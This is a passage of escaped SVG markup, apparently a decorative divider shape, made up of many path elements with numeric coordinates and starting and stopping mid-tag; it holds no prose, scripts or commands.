xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path 